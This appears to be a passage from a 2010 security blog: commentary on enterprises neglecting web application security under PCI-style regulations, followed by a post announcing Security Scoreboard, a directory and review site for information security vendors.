Of course start-ups start using the services of other start-ups, and before you know it you have a growing company within a relatively large enterprise ecosystem where everyone is using consumer-grade security without real threat analysis. It is this transition to the enterprise level where in theory the threat analysis should mature and security measures fundamentally reassessed. By that point though, the ship has gotten big and bulky and reversing course is no longer easy.

So often as companies go from the Whatever zone to the Pragmatic zone, they sweep app sec issues under the rug and hope (often correctly) that no one is going to notice or care. Today, too many enterprises are treating web application vulnerabilities as if they were still in the Whatever zone - and then if someone asks about security, they can proudly answer glad-you-asked, look-at-our-firewall. The details of the Imperva-WhiteHat report (and if you have made it this far in the post, you should really read the full report) reflect this - most security professionals report an internal culture that is either cavalier or helpless about web application vulnerabilities.

How is this going to change? If recent history is any guide, regulations and contracts will either break or reinforce the current security spending imbalance. The current trend is towards the latter. At the risk of sounding like a broken record, I'll mention again that even relatively recent legislation and standards (PCI, the Massachusetts data security regulation, and for that matter most RFPs) completely gloss over application security. For reasons that I don't fully understand, the PCI Prioritized Approach puts most network security issues ahead of application security issues. And now Washington State has adopted a PCI-based law. This certainly doesn't bode well for correcting security spending imbalances any time soon.

Sunday, January 31, 2010

Security Scoreboard is Live!

I am very excited to announce the launch this week of Security Scoreboard - an online resource for researching and reviewing information security vendors. Security Scoreboard features over 600 vendors and aims to become a valuable resource for CISOs, CIOs, system administrators, and anyone who is in the market for information security products and services.

Why Security Scoreboard? As an information security executive at a mid-size company in New York City, I constantly face the challenge of trying to quickly identify and assess the security vendors who offer solutions in a given space. While there is a ton of available vendor content - webinars, press releases, whitepapers, etc - I have always found one vital resource to be missing in the purchase process. Until now there hasn't been one convenient and objective place to see side-by-side profiles of all the vendors addressing a specific security challenge. Security Scoreboard fills this gap by providing a starting point to get oriented about all available solutions before doing a deep dive on those vendors that seem the most promising.

CENTRALIZING RELEVANT INFORMATION

Let's take the example of a security manager looking for an enterprise privileged access management solution. Searching online will lead him or her to some of the larger players. But finding a comprehensive online list of all the players in this field is surprisingly hard, and involves plowing through an overwhelming amount of irrelevant information.

And once the main players are identified, finding basic objective information on each vendor can be tough. The average vendor publishes numerous press releases that then get picked up and replicated on multiple other sites. Independent opinions and information about the vendor get buried at the bottom of online search results.

That's where Security Scoreboard fits in the picture. Security Scoreboard is meant as a time saver - a quick way for security consumers to orient themselves and separate the wheat from the informational chaff.

This is especially useful for buyers in the SMB market. One of the things that strikes me every time I go to conferences like RSA is the sheer number of security vendors with unique and innovative approaches to various security challenges. At the same time, there has been a distinct lack of freely available resources for researching these vendors. Potential buyers lack an easy way to put a vendor in context, research its competitors, and objectively assess whether a vendor's solution will work for them.

The information imbalance is less of a problem for security pros in larger companies that have access to analyst and other services to research the competing claims of a large number of vendors. But security managers and CISOs at smaller companies usually do not have extensive access to such services. For them, even identifying who the main players are in a space can be a time consuming process. Security Scoreboard is of particular use for these often-overlooked consumers of IT security.

CUSTOMER REVIEWS

Security Scoreboard provides more than just a comprehensive directory of security vendors. Users can also leave reviews describing their good or bad experiences with security vendors they have worked with. Of course, like any public review site, there is no reliable way to verify that online reviews correspond to actual customers. But security pros by nature are sophisticated enough to process information accordingly and to spot obvious attempts to game the system.

RESOURCES FOR VENDORS

Most information security vendors will find their company listed with its own company page on Security Scoreboard. Vendors who are not yet listed can submit a request and will be added if they meet the basic requirements (a focus on information security and an active market presence). There is also a form vendors can fill out to get free monthly Google Analytics reports showing the search terms that are leading users to their company page.

Security Scoreboard will also be offering vendors the ability to convert their page to a "premium page" and expand on the very short summary currently in place for each company. This will give vendors who want to spruce up their company page an opportunity to get their message across next to the user reviews and other links related to their company. In keeping with the transparency that is at the heart of Security Scoreboard, this structure will be clearly described on the website.

To celebrate our launch, Security Scoreboard will be sponsoring some great prizes at the Security Podcasters and Bloggers Meetup at ShmooCon this coming weekend in DC. Come by and say hello if you are going to be at the event.